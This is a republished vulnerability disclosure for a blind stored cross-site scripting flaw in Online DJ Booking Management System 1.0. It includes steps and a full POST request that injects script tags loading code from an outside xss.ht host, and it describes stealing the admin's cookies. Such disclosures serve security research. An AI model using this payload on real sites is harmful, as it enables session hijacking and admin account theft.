Home Tools Exploits & CVE's Online DJ Booking Management System 1.0 Cross Site Scripting

Online DJ Booking Management System 1.0 Cross Site Scripting

October 7, 2021

625

Online DJ Booking Management System version 1.0 suffers from a cross site scripting vulnerability.

# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
# Date: 2021-10-06
# Exploit Author: Yash Mahajan
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
# Version: V 1.0
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
# Tested on Windows 10, XAMPP

*Steps to Reproduce:*
1) Navigate http://localhost/odms/book-services.php?bookid=1
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".

Request:
========

POST /odms/book-services.php?bookid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 335
Origin: http://localhost
Connection: close
Referer: http://localhost/odms/book-services.php?bookid=1
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

name="><script+src=https://biest.xss.ht></script>&[email protected]&mobnum=9999999999
&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book


Now to confirm the vulnerability

3) Login as admin by navigating to http://localhost/odms/admin/login.php.
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
5) Able to steal admin's cookies successfully!!

#POC
https://ibb.co/Vj3jn2d
https://ibb.co/bm9MGdG

Online DJ Booking Management System 1.0 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

Over 500 people targeted by Pegasus spyware in Poland, officials say

MGM sues to block FTC investigation of its data security

Ransomware attack has cost UnitedHealth $872 million; total expected to surpass...

POPULAR POSTS

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

Domhttpx – A Google Search Engine Dorker With HTTP Toolkit Built...

POPULAR CATEGORY

Arm Mali CSF KBASE_REG_NO_USER_FREE Unsafe Use Use-After-Free

Barcodes Generator 1.0 Cross Site Scripting

Odine Solutions GateKeeper 1.0 SQL Injection